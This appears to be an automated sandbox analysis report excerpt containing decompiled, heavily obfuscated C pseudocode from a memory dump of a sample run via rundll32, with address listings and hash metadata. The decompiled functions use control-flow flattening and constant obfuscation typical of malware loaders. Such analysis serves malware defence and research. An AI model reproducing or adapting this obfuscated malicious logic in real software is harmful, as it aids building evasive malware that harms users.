                                                                                                                          									_t683 = _t687;
                                                                                                                          									_t634 = _t675 >> 1;
                                                                                                                          									__eflags = _t634;
                                                                                                                          									_t566 = memset(_t683, 0x2d002d, _t634 << 2);
                                                                                                                          									asm("adc ecx, ecx");
                                                                                                                          									_t687 = _t687 + _t675 * 2;
                                                                                                                          									memset(_t683 + _t634, _t566, 0);
                                                                                                                          									_t694 =  &(_t694[6]);
                                                                                                                          								}
                                                                                                                          								_t563 = E007A0AE0(0x10, 8);
                                                                                                                          								_push(_v384);
                                                                                                                          								_t682 = _t563;
                                                                                                                          								_push(_t687);
                                                                                                                          								_push(_t682);
                                                                                                                          								_push(0xb);
                                                                                                                          								E007980E3(_v352, _v340);
                                                                                                                          								_t686 = 0x57ff6e7;
                                                                                                                          								goto L11;
                                                                                                                          							} else {
                                                                                                                          								__eflags = _t686 - 0xa9d081a;
                                                                                                                          								if(_t686 == 0xa9d081a) {
                                                                                                                          									E0079ED7E(_v452, _t603, _v520,  *_t610,  *((intOrPtr*)(_t610 + 4)));
                                                                                                                          									_t610 = _v456;
                                                                                                                          									_t694 =  &(_t694[3]);
                                                                                                                          									_t686 = 0x7498ebf;
                                                                                                                          									_t603 = _t603 +  *((intOrPtr*)(_t610 + 4));
                                                                                                                          									goto L1;
                                                                                                                          								} else {
                                                                                                                          									__eflags = _t686 - 0xe639f63;
                                                                                                                          									if(_t686 == 0xe639f63) {
                                                                                                                          										E007A8519(_v416, _v464, _v300);
                                                                                                                          										return 0;
                                                                                                                          									}
                                                                                                                          									__eflags = _t686 - _t551;
                                                                                                                          									if(__eflags != 0) {
                                                                                                                          										goto L28;
                                                                                                                          									} else {
                                                                                                                          										_push(_v476);
                                                                                                                          										_push(_v420);
                                                                                                                          										_v292 = _t682 + _t693;
                                                                                                                          										_push(_v356);
                                                                                                                          										_t603 = E007AC0C1( &_v128, __eflags,  &_v288, E007A8606(_v492, 0x791610, __eflags),  &_v256, _v348, _v412, _v460, _t693, _t682 + _t693 - _t693, _v324) + _t693;
                                                                                                                          										E0079A8B0(_v400, _t572, _v376);
                                                                                                                          										_t694 =  &(_t694[0xd]);
                                                                                                                          										_t686 = 0xa9d081a;
                                                                                                                          										goto L12;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						goto L30;
                                                                                                                          						L28:
                                                                                                                          						__eflags = _t686 - 0x7bf1275;
                                                                                                                          					} while (__eflags != 0);
                                                                                                                          					L29:
                                                                                                                          					return _v300;
                                                                                                                          				}
                                                                                                                          			}
                                                                                                                          0x007af903
                                                                                                                          0x007af90e
                                                                                                                          0x007af919
                                                                                                                          0x007af921
                                                                                                                          0x007af929
                                                                                                                          0x007af930
                                                                                                                          0x007af938
                                                                                                                          0x007af940
                                                                                                                          0x007af947
                                                                                                                          0x007af94a
                                                                                                                          0x007af94b
                                                                                                                          0x007af94f
                                                                                                                          0x007af954
                                                                                                                          0x007af958
                                                                                                                          0x007af960
                                                                                                                          0x007af968
                                                                                                                          0x007af973
                                                                                                                          0x007af97e
                                                                                                                          0x007af989
                                                                                                                          0x007af99c
                                                                                                                          0x007af9a3
                                                                                                                          0x007af9ae
                                                                                                                          0x007af9b9
                                                                                                                          0x007af9c1
                                                                                                                          0x007af9c6
                                                                                                                          0x007af9ca
                                                                                                                          0x007af9cf
                                                                                                                          0x007af9d7
                                                                                                                          0x007af9e4
                                                                                                                          0x007af9e8
                                                                                                                          0x007af9ed
                                                                                                                          0x007af9f2
                                                                                                                          0x007af9fa
                                                                                                                          0x007afa05
                                                                                                                          0x007afa10
                                                                                                                          0x007afa1b
                                                                                                                          0x007afa26
                                                                                                                          0x007afa31
                                                                                                                          0x007afa3c
                                                                                                                          0x007afa47
                                                                                                                          0x007afa52
                                                                                                                          0x007afa5d
                                                                                                                          0x007afa68
                                                                                                                          0x007afa73
                                                                                                                          0x007afa7b
                                                                                                                          0x007afa8b
                                                                                                                          0x007afa8f
                                                                                                                          0x007afa97
                                                                                                                          0x007afaa7
                                                                                                                          0x007afaab
                                                                                                                          0x007afab0
                                                                                                                          0x007afab5
                                                                                                                          0x007afabd
                                                                                                                          0x007afac5
                                                                                                                          0x007afacd
                                                                                                                          0x007afad2
                                                                                                                          0x007afada
                                                                                                                          0x007afae2
                                                                                                                          0x007afaea
                                                                                                                          0x007afaf2
                                                                                                                          0x007afafa
                                                                                                                          0x007afb05
                                                                                                                          0x007afb0d
                                                                                                                          0x007afb18
                                                                                                                          0x007afb25
                                                                                                                          0x007afb29
                                                                                                                          0x007afb31
                                                                                                                          0x007afb39
                                                                                                                          0x007afb41
                                                                                                                          0x007afb49
                                                                                                                          0x007afb4e
                                                                                                                          0x007afb5c
                                                                                                                          0x007afb62
                                                                                                                          0x007afb6a
                                                                                                                          0x007afb79
                                                                                                                          0x007afb7c
                                                                                                                          0x007afb83
                                                                                                                          0x007afb87
                                                                                                                          0x007afb8c
                                                                                                                          0x007afb94
                                                                                                                          0x007afbaa
                                                                                                                          0x007afbb1
                                                                                                                          0x007afbb8
                                                                                                                          0x007afbc3
                                                                                                                          0x007afbd0
                                                                                                                          0x007afbd1
                                                                                                                          0x007afbda
                                                                                                                          0x007afbde
                                                                                                                          0x007afbe6
                                                                                                                          0x007afbee
                                                                                                                          0x007afc03
                                                                                                                          0x007afc07
                                                                                                                          0x007afc0f
                                                                                                                          0x007afc17
                                                                                                                          0x007afc24
                                                                                                                          0x007afc28
                                                                                                                          0x007afc30
                                                                                                                          0x007afc35
                                                                                                                          0x007afc3d
                                                                                                                          0x007afc45
                                                                                                                          0x007afc4a
                                                                                                                          0x007afc52
                                                                                                                          0x007afc5a
                                                                                                                          0x007afc62
                                                                                                                          0x007afc67
                                                                                                                          0x007afc6f
                                                                                                                          0x007afc74
                                                                                                                          0x007afc7c
                                                                                                                          0x007afc7c
                                                                                                                          0x007afc7c
                                                                                                                          0x007afc81
                                                                                                                          0x007afc81
                                                                                                                          0x007afc81
                                                                                                                          0x007afc81
                                                                                                                          0x007afc87
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007afc8d
                                                                                                                          0x007affc3
                                                                                                                          0x007affcc
                                                                                                                          0x007affd3
                                                                                                                          0x007b000b
                                                                                                                          0x007b001f
                                                                                                                          0x007b0024
                                                                                                                          0x007b0030
                                                                                                                          0x007b0032
                                                                                                                          0x00000000
                                                                                                                          0x007b0032
                                                                                                                          0x007afc99
                                                                                                                          0x007afdb2
                                                                                                                          0x007afdc5
                                                                                                                          0x007afdc6
                                                                                                                          0x007afdcc
                                                                                                                          0x007afdd4
                                                                                                                          0x007afdd6
                                                                                                                          0x007afddc
                                                                                                                          0x007afde0
                                                                                                                          0x00000000
                                                                                                                          0x007afde0
                                                                                                                          0x007afca5
                                                                                                                          0x007afd4c
                                                                                                                          0x007afd55
                                                                                                                          0x007afd60
                                                                                                                          0x007afd75
                                                                                                                          0x007afd76
                                                                                                                          0x007afd77
                                                                                                                          0x007afd78
                                                                                                                          0x007afd8a
                                                                                                                          0x007afd9c
                                                                                                                          0x007afda1
                                                                                                                          0x007afda4
                                                                                                                          0x007afd0b
                                                                                                                          0x007afd0b
                                                                                                                          0x007afc7c
                                                                                                                          0x007afc7c
                                                                                                                          0x007afc7c
                                                                                                                          0x00000000
                                                                                                                          0x007afc7c
                                                                                                                          0x007afc7c
                                                                                                                          0x007afcb1
                                                                                                                          0x007afcb9
                                                                                                                          0x007afcdd
                                                                                                                          0x007afce2
                                                                                                                          0x007afcea
                                                                                                                          0x007afcfa
                                                                                                                          0x007afcfb
                                                                                                                          0x007afcfc
                                                                                                                          0x007afcfe
                                                                                                                          0x007afd03
                                                                                                                          0x007afd08
                                                                                                                          0x007afd08
                                                                                                                          0x00000000
                                                                                                                          0x007afcbb
                                                                                                                          0x007afcc1
                                                                                                                          0x00000000
                                                                                                                          0x007afcc7
                                                                                                                          0x007afcc7
                                                                                                                          0x00000000
                                                                                                                          0x007afcc7
                                                                                                                          0x007afcc1
                                                                                                                          0x007affc2
                                                                                                                          0x007affc2
                                                                                                                          0x007affc2
                                                                                                                          0x007afd1b
                                                                                                                          0x007afd2d
                                                                                                                          0x007afd2e
                                                                                                                          0x007afd2f
                                                                                                                          0x007afd34
                                                                                                                          0x007afd3d
                                                                                                                          0x007afd3f
                                                                                                                          0x007afd45
                                                                                                                          0x00000000
                                                                                                                          0x007afd45
                                                                                                                          0x00000000
                                                                                                                          0x007afd3f
                                                                                                                          0x007afde8
                                                                                                                          0x007afdee
                                                                                                                          0x007aff6b
                                                                                                                          0x007aff70
                                                                                                                          0x007aff7e
                                                                                                                          0x007aff8b
                                                                                                                          0x007aff8c
                                                                                                                          0x007aff8d
                                                                                                                          0x007aff8f
                                                                                                                          0x007aff94
                                                                                                                          0x007aff98
                                                                                                                          0x007aff9b
                                                                                                                          0x007affa0
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: :B8$;r$[h~$y8$|%$&e$0{
                                                                                                                          • API String ID: 0-2624470838
                                                                                                                          • Opcode ID: dc5d1e061fe74f9db5568189b74825440e4bb7b1732b24d1fa17ff826067fa35
                                                                                                                          • Instruction ID: 31b0332ed7ab4da5a0a770ee7eb29981495cc7e2f37049b62b8aeec3e25fa38f
                                                                                                                          • Opcode Fuzzy Hash: dc5d1e061fe74f9db5568189b74825440e4bb7b1732b24d1fa17ff826067fa35
                                                                                                                          • Instruction Fuzzy Hash: A7523071509380CFD3B8CF65C58AA8BFBE1BBC5358F10891DE19A96260D7B48949CF53
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 89%
                                                                                                                          			E0079D6D8(intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                          				char _v4;
                                                                                                                          				char _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				intOrPtr* _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				unsigned int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				signed int _v84;
                                                                                                                          				signed int _v88;
                                                                                                                          				signed int _v92;
                                                                                                                          				signed int _v96;
                                                                                                                          				signed int _v100;
                                                                                                                          				signed int _v104;
                                                                                                                          				signed int _v108;
                                                                                                                          				signed int _v112;
                                                                                                                          				signed int _v116;
                                                                                                                          				signed int _v120;
                                                                                                                          				signed int _v124;
                                                                                                                          				signed int _v128;
                                                                                                                          				signed int _v132;
                                                                                                                          				signed int _v136;
                                                                                                                          				signed int _v140;
                                                                                                                          				signed int _v144;
                                                                                                                          				signed int _v148;
                                                                                                                          				intOrPtr _v152;
                                                                                                                          				signed int _v156;
                                                                                                                          				intOrPtr _v160;
                                                                                                                          				signed int _v164;
                                                                                                                          				signed int _v168;
                                                                                                                          				signed int _v172;
                                                                                                                          				signed int _v176;
                                                                                                                          				signed int _v180;
                                                                                                                          				signed int _v184;
                                                                                                                          				signed int _v188;
                                                                                                                          				signed int _v192;
                                                                                                                          				void* __ecx;
                                                                                                                          				intOrPtr _t400;
                                                                                                                          				void* _t407;
                                                                                                                          				signed int _t410;
                                                                                                                          				intOrPtr _t421;
                                                                                                                          				signed int _t423;
                                                                                                                          				signed int _t424;
                                                                                                                          				signed int _t425;
                                                                                                                          				signed int _t426;
                                                                                                                          				signed int _t427;
                                                                                                                          				signed int _t428;
                                                                                                                          				signed int _t429;
                                                                                                                          				signed int _t430;
                                                                                                                          				signed int _t431;
                                                                                                                          				signed int _t432;
                                                                                                                          				signed int _t433;
                                                                                                                          				intOrPtr _t434;
                                                                                                                          				void* _t473;
                                                                                                                          				intOrPtr* _t482;
                                                                                                                          				signed int _t485;
                                                                                                                          				signed int* _t491;
                                                                                                                          				void* _t493;
                                                                                                                          
                                                                                                                          				_push(_a16);
                                                                                                                          				_push(_a12);
                                                                                                                          				_v16 = __edx;
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				E007A20B9(__edx);
                                                                                                                          				_v72 = 0xfd05e7;
                                                                                                                          				_t491 =  &(( &_v192)[6]);
                                                                                                                          				_v72 = _v72 | 0xfdc7c414;
                                                                                                                          				_v72 = _v72 ^ 0xfdffc5f6;
                                                                                                                          				_t489 = 0;
                                                                                                                          				_v128 = 0x159cf;
                                                                                                                          				_t421 = 0;
                                                                                                                          				_v128 = _v128 + 0x2543;
                                                                                                                          				_t485 = 0x8939926;
                                                                                                                          				_v128 = _v128 ^ 0xc1c453fb;
                                                                                                                          				_v128 = _v128 ^ 0xc1c52ce8;
                                                                                                                          				_v188 = 0xc0a375;
                                                                                                                          				_t423 = 0x5a;
                                                                                                                          				_v188 = _v188 / _t423;
                                                                                                                          				_v188 = _v188 + 0xf5e3;
                                                                                                                          				_v188 = _v188 + 0xffffba7d;
                                                                                                                          				_v188 = _v188 ^ 0x0002d452;
                                                                                                                          				_v192 = 0xeb0e91;
                                                                                                                          				_v192 = _v192 << 0xb;
                                                                                                                          				_v192 = _v192 >> 0xd;
                                                                                                                          				_v192 = _v192 | 0x4be38997;
                                                                                                                          				_v192 = _v192 ^ 0x4be25280;
                                                                                                                          				_v52 = 0x3397e5;
                                                                                                                          				_v52 = _v52 ^ 0x345a01ed;
                                                                                                                          				_v52 = _v52 ^ 0x346a35aa;
                                                                                                                          				_v60 = 0x140ff9;
                                                                                                                          				_t424 = 6;
                                                                                                                          				_v60 = _v60 / _t424;
                                                                                                                          				_v60 = _v60 ^ 0x000ad59a;
                                                                                                                          				_v168 = 0x6059cb;
                                                                                                                          				_t425 = 0x1a;
                                                                                                                          				_v168 = _v168 * 0x7f;
                                                                                                                          				_v168 = _v168 / _t425;
                                                                                                                          				_v168 = _v168 * 0x21;
                                                                                                                          				_v168 = _v168 ^ 0x3ca5e455;
                                                                                                                          				_v112 = 0x1e6ccd;
                                                                                                                          				_v112 = _v112 << 0xc;
                                                                                                                          				_v112 = _v112 + 0xffff3925;
                                                                                                                          				_v112 = _v112 ^ 0xe6c2746b;
                                                                                                                          				_v44 = 0xb8d15a;
                                                                                                                          				_v44 = _v44 >> 0xb;
                                                                                                                          				_v44 = _v44 ^ 0x0008fc1e;
                                                                                                                          				_v172 = 0x2478d;
                                                                                                                          				_v172 = _v172 ^ 0x68bbc6f8;
                                                                                                                          				_v172 = _v172 >> 0xc;
                                                                                                                          				_v172 = _v172 | 0x6f66efc5;
                                                                                                                          				_v172 = _v172 ^ 0x6f64ef75;
                                                                                                                          				_v116 = 0x51a99f;
                                                                                                                          				_v116 = _v116 | 0x1f129b6c;
                                                                                                                          				_v116 = _v116 ^ 0xc118cdce;
                                                                                                                          				_v116 = _v116 ^ 0xde47442a;
                                                                                                                          				_v132 = 0x216e1a;
                                                                                                                          				_v132 = _v132 + 0xffff43fb;
                                                                                                                          				_v132 = _v132 ^ 0x7008f7db;
                                                                                                                          				_v132 = _v132 ^ 0x702542ff;
                                                                                                                          				_v84 = 0xc91edc;
                                                                                                                          				_t426 = 0x5e;
                                                                                                                          				_v84 = _v84 / _t426;
                                                                                                                          				_v84 = _v84 ^ 0x0006a22a;
                                                                                                                          				_v164 = 0xa7de11;
                                                                                                                          				_v164 = _v164 + 0xffff6841;
                                                                                                                          				_v164 = _v164 >> 4;
                                                                                                                          				_v164 = _v164 << 3;
                                                                                                                          				_v164 = _v164 ^ 0x005f8816;
                                                                                                                          				_v108 = 0xdd6066;
                                                                                                                          				_v108 = _v108 >> 8;
                                                                                                                          				_v108 = _v108 << 8;
                                                                                                                          				_v108 = _v108 ^ 0x00d87344;
                                                                                                                          				_v92 = 0x21cc88;
                                                                                                                          				_v92 = _v92 ^ 0xd81b96af;
                                                                                                                          				_v92 = _v92 ^ 0xd8329727;
                                                                                                                          				_v96 = 0xbd6d4e;
                                                                                                                          				_t427 = 0x26;
                                                                                                                          				_v96 = _v96 / _t427;
                                                                                                                          				_v96 = _v96 ^ 0x00061825;
                                                                                                                          				_v24 = 0x6502ac;
                                                                                                                          				_v24 = _v24 << 4;
                                                                                                                          				_v24 = _v24 ^ 0x065de4e3;
                                                                                                                          				_v56 = 0x642336;
                                                                                                                          				_v56 = _v56 + 0xffffd3db;
                                                                                                                          				_v56 = _v56 ^ 0x006ffb84;
                                                                                                                          				_v68 = 0x348f1;
                                                                                                                          				_t428 = 0x55;
                                                                                                                          				_v68 = _v68 / _t428;
                                                                                                                          				_v68 = _v68 ^ 0x0008f449;
                                                                                                                          				_v76 = 0x3c74f1;
                                                                                                                          				_v76 = _v76 + 0xffff407e;
                                                                                                                          				_v76 = _v76 ^ 0x003b6445;
                                                                                                                          				_v88 = 0xc452b0;
                                                                                                                          				_v88 = _v88 + 0xffff3a6d;
                                                                                                                          				_v88 = _v88 ^ 0x00c8dd7a;
                                                                                                                          				_v48 = 0xc68c2;
                                                                                                                          				_t429 = 0x57;
                                                                                                                          				_v48 = _v48 / _t429;
                                                                                                                          				_v48 = _v48 ^ 0x0008f98a;
                                                                                                                          				_v100 = 0x631361;
                                                                                                                          				_v100 = _v100 | 0x5af5ab8e;
                                                                                                                          				_v100 = _v100 ^ 0x5affcbc5;
                                                                                                                          				_v148 = 0x1761a;
                                                                                                                          				_v148 = _v148 ^ 0xebf93349;
                                                                                                                          				_v148 = _v148 >> 4;
                                                                                                                          				_v148 = _v148 ^ 0x0eb625e6;
                                                                                                                          				_v40 = 0xe5378a;
                                                                                                                          				_v40 = _v40 >> 2;
                                                                                                                          				_v40 = _v40 ^ 0x003c8b43;
                                                                                                                          				_v140 = 0x73545;
                                                                                                                          				_t430 = 0x61;
                                                                                                                          				_v140 = _v140 * 0x21;
                                                                                                                          				_v140 = _v140 / _t430;
                                                                                                                          				_v140 = _v140 ^ 0x0002b6d6;
                                                                                                                          				_v80 = 0x39d04;
                                                                                                                          				_v80 = _v80 >> 4;
                                                                                                                          				_v80 = _v80 ^ 0x00009cd0;
                                                                                                                          				_v156 = 0x1ba0aa;
                                                                                                                          				_v156 = _v156 + 0x716e;
                                                                                                                          				_v156 = _v156 << 0xd;
                                                                                                                          				_v156 = _v156 ^ 0xb6bcbcaf;
                                                                                                                          				_v156 = _v156 ^ 0x34f57f5f;
                                                                                                                          				_v20 = 0xda4179;
                                                                                                                          				_t431 = 0x27;
                                                                                                                          				_t482 = _v16;
                                                                                                                          				_v20 = _v20 / _t431;
                                                                                                                          				_v20 = _v20 ^ 0x00092493;
                                                                                                                          				_v32 = 0x6dc25;
                                                                                                                          				_v32 = _v32 >> 0xf;
                                                                                                                          				_v32 = _v32 ^ 0x0008149e;
                                                                                                                          				_v180 = 0x3ec4dc;
                                                                                                                          				_v180 = _v180 >> 5;
                                                                                                                          				_t432 = 0x70;
                                                                                                                          				_v180 = _v180 / _t432;
                                                                                                                          				_v180 = _v180 + 0xffff18e8;
                                                                                                                          				_v180 = _v180 ^ 0xfff4c632;
                                                                                                                          				_v64 = 0xea19a3;
                                                                                                                          				_v64 = _v64 | 0xee52e837;
                                                                                                                          				_v64 = _v64 ^ 0xeef909eb;
                                                                                                                          				_v28 = 0xcaf9fa;
                                                                                                                          				_v28 = _v28 >> 0xe;
                                                                                                                          				_v28 = _v28 ^ 0x000e6f4e;
                                                                                                                          				_v120 = 0x563e36;
                                                                                                                          				_v120 = _v120 >> 0xe;
                                                                                                                          				_v120 = _v120 << 5;
                                                                                                                          				_v120 = _v120 ^ 0x00027d23;
                                                                                                                          				_v176 = 0x87c40f;
                                                                                                                          				_v176 = _v176 ^ 0xb401f56c;
                                                                                                                          				_v176 = _v176 + 0xffff7429;
                                                                                                                          				_v176 = _v176 | 0xf3ec0d69;
                                                                                                                          				_v176 = _v176 ^ 0xf7eb47c6;
                                                                                                                          				_v184 = 0x47488d;
                                                                                                                          				_v184 = _v184 >> 0xf;
                                                                                                                          				_v184 = _v184 << 0xf;
                                                                                                                          				_v184 = _v184 << 1;
                                                                                                                          				_v184 = _v184 ^ 0x0086c0ad;
                                                                                                                          				_v136 = 0xb24629;
                                                                                                                          				_v136 = _v136 | 0x7ef33f67;
                                                                                                                          				_v136 = _v136 ^ 0x7ef17c1c;
                                                                                                                          				_v144 = 0xba01aa;
                                                                                                                          				_v144 = _v144 | 0x3cf3a1ff;
                                                                                                                          				_v144 = _v144 ^ 0x3cf83085;
                                                                                                                          				_v124 = 0xbe6d5e;
                                                                                                                          				_v124 = _v124 + 0xffff96e9;
                                                                                                                          				_v124 = _v124 | 0xcf3d3218;
                                                                                                                          				_v124 = _v124 ^ 0xcfb1306a;
                                                                                                                          				_v36 = 0xa69a94;
                                                                                                                          				_v36 = _v36 + 0xffffed5e;
                                                                                                                          				_v36 = _v36 ^ 0x00a0b8ce;
                                                                                                                          				_v104 = 0xa8033b;
                                                                                                                          				_t433 = 9;
                                                                                                                          				_v104 = _v104 / _t433;
                                                                                                                          				_v104 = _v104 >> 6;
                                                                                                                          				_v104 = _v104 ^ 0x0005e2c3;
                                                                                                                          				while(1) {
                                                                                                                          					L1:
                                                                                                                          					_t434 = _v160;
                                                                                                                          					while(1) {
                                                                                                                          						_t400 = _v152;
                                                                                                                          						while(1) {
                                                                                                                          							L3:
                                                                                                                          							_t493 = _t485 - 0xa1723c1;
                                                                                                                          							if(_t493 > 0) {
                                                                                                                          								goto L19;
                                                                                                                          							}
                                                                                                                          							L4:
                                                                                                                          							if(_t493 == 0) {
                                                                                                                          								E007A8519(_v144, _v124, _t489);
                                                                                                                          								_t485 = 0x4b7559b;
                                                                                                                          								goto L17;
                                                                                                                          							} else {
                                                                                                                          								if(_t485 == 0x4b7559b) {
                                                                                                                          									return E007A8519(_v36, _v104, _t421);
                                                                                                                          								}
                                                                                                                          								if(_t485 == 0x4ed616e) {
                                                                                                                          									_t441 = _v172;
                                                                                                                          									_t407 = E007A16AF(_v172,  &_v12, _v116, _v132, _t434, _a8, _t421, _v84, _t434,  &_v4, _t434, _v164, _v108, _v92, _v96, _t434, _t434, _v24, _t434, _v56);
                                                                                                                          									_t491 =  &(_t491[0x12]);
                                                                                                                          									if(_t407 == 0) {
                                                                                                                          										L16:
                                                                                                                          										_t485 = 0xa1723c1;
                                                                                                                          										L17:
                                                                                                                          										_t400 = _v152;
                                                                                                                          									} else {
                                                                                                                          										_t410 = E007AD25E(_t441);
                                                                                                                          										_t485 = 0x9a40434;
                                                                                                                          										_t400 = _v12 * 0x2c + _t421;
                                                                                                                          										_v152 = _t400;
                                                                                                                          										_t482 =  >=  ? _t421 : (_t410 & 0x0000001f) * 0x2c + _t421;
                                                                                                                          									}
                                                                                                                          									_t434 = _v160;
                                                                                                                          									_t473 = 0x6a50b97;
                                                                                                                          									continue;
                                                                                                                          								} else {
                                                                                                                          									if(_t485 == _t473) {
                                                                                                                          										E007A2007(_v72, _v40, _v140, _t434, _v80,  &_v8, _v156, _t434, _t489, _v20);
                                                                                                                          										_t485 =  !=  ? 0xd1a593f : 0xb29ddc7;
                                                                                                                          										_t400 = E007A8F9E(_v32, _v180, _v64, _v28, _v160);
                                                                                                                          										_t491 =  &(_t491[0xb]);
                                                                                                                          										L30:
                                                                                                                          										_t473 = 0x6a50b97;
                                                                                                                          										goto L31;
                                                                                                                          									} else {
                                                                                                                          										if(_t485 == 0x8939926) {
                                                                                                                          											_t485 = 0xe60f9b1;
                                                                                                                          											continue;
                                                                                                                          										} else {
                                                                                                                          											if(_t485 != 0x9a40434) {
                                                                                                                          												L31:
                                                                                                                          												if(_t485 != 0x88fb243) {
                                                                                                                          													goto L1;
                                                                                                                          												}
                                                                                                                          											} else {
                                                                                                                          												_t434 = E007942C4(_v88, _a8, _v48, _v188,  *_t482, _v100, _v148);
                                                                                                                          												_t491 =  &(_t491[5]);
                                                                                                                          												_v160 = _t434;
                                                                                                                          												_t473 = 0x6a50b97;
                                                                                                                          												_t485 =  !=  ? 0x6a50b97 : 0xb29ddc7;
                                                                                                                          												_t400 = _v152;
                                                                                                                          												while(1) {
                                                                                                                          													L3:
                                                                                                                          													_t493 = _t485 - 0xa1723c1;
                                                                                                                          													if(_t493 > 0) {
                                                                                                                          														goto L19;
                                                                                                                          													}
                                                                                                                          													goto L4;
                                                                                                                          												}
                                                                                                                          												goto L19;
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							L34:
                                                                                                                          							return _t400;
                                                                                                                          							L19:
                                                                                                                          							if(_t485 == 0xaf524c8) {
                                                                                                                          								_push(_t434);
                                                                                                                          								_push(_t434);
                                                                                                                          								_t400 = E00797FF2(0x2000);
                                                                                                                          								_t489 = _t400;
                                                                                                                          								if(_t400 == 0) {
                                                                                                                          									_t485 = 0x4b7559b;
                                                                                                                          									goto L30;
                                                                                                                          								} else {
                                                                                                                          									_t485 = 0x4ed616e;
                                                                                                                          									goto L17;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								if(_t485 == 0xb29ddc7) {
                                                                                                                          									_t482 = _t482 + 0x2c;
                                                                                                                          									asm("sbb esi, esi");
                                                                                                                          									_t485 = (_t485 & 0xff8ce073) + 0xa1723c1;
                                                                                                                          									continue;
                                                                                                                          								} else {
                                                                                                                          									_t400 = 0xd1a593f;
                                                                                                                          									if(_t485 == 0xd1a593f) {
                                                                                                                          										E0079DF6F(_v120, _v176, _v128, _v16, _v184, _v136, _t489);
                                                                                                                          										_t491 =  &(_t491[5]);
                                                                                                                          										goto L16;
                                                                                                                          									} else {
                                                                                                                          										if(_t485 != 0xe60f9b1) {
                                                                                                                          											goto L31;
                                                                                                                          										} else {
                                                                                                                          											_push(_t434);
                                                                                                                          											_push(_t434);
                                                                                                                          											_t400 = E00797FF2(0x20000);
                                                                                                                          											_t421 = 0xd1a593f;
                                                                                                                          											if(0xd1a593f != 0) {
                                                                                                                          												_t485 = 0xaf524c8;
                                                                                                                          												goto L17;
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							goto L34;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}









































































                                                                                                                          0x0079dcb0
                                                                                                                          0x00000000
                                                                                                                          0x0079dcaa
                                                                                                                          0x0079dce6
                                                                                                                          0x0079dcde
                                                                                                                          0x0079dcd6
                                                                                                                          0x0079dcce
                                                                                                                          0x0079df6e
                                                                                                                          0x0079df6e
                                                                                                                          0x0079de73
                                                                                                                          0x0079de79
                                                                                                                          0x0079df22
                                                                                                                          0x0079df23
                                                                                                                          0x0079df24
                                                                                                                          0x0079df29
                                                                                                                          0x0079df2f
                                                                                                                          0x0079df3b
                                                                                                                          0x00000000
                                                                                                                          0x0079df31
                                                                                                                          0x0079df31
                                                                                                                          0x00000000
                                                                                                                          0x0079df31
                                                                                                                          0x0079de7f
                                                                                                                          0x0079de85
                                                                                                                          0x0079def6
                                                                                                                          0x0079defb
                                                                                                                          0x0079df03
                                                                                                                          0x00000000
                                                                                                                          0x0079de87
                                                                                                                          0x0079de87
                                                                                                                          0x0079de8e
                                                                                                                          0x0079dee9
                                                                                                                          0x0079deee
                                                                                                                          0x00000000
                                                                                                                          0x0079de90
                                                                                                                          0x0079de96
                                                                                                                          0x00000000
                                                                                                                          0x0079de9c
                                                                                                                          0x0079deb3
                                                                                                                          0x0079deb4
                                                                                                                          0x0079deb5
                                                                                                                          0x0079deba
                                                                                                                          0x0079dec0
                                                                                                                          0x0079dec6
                                                                                                                          0x00000000
                                                                                                                          0x0079dec6
                                                                                                                          0x0079dec0
                                                                                                                          0x0079de96
                                                                                                                          0x0079de8e
                                                                                                                          0x0079de85
                                                                                                                          0x00000000
                                                                                                                          0x0079de79
                                                                                                                          0x0079dcaa
                                                                                                                          0x0079dca6

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 6#d$6>V$7R$C%$Ed;$nq$udo
                                                                                                                          • API String ID: 0-652707834
                                                                                                                          • Opcode ID: f1ebdc49b849bf8c904815538ebaa2ee5cbb6585970c67cf9760e8e328c8f8b3
                                                                                                                          • Instruction ID: ff9a3f1bea870af9086b4b16afb564f611c4d9444754597a267c1269e490fc27
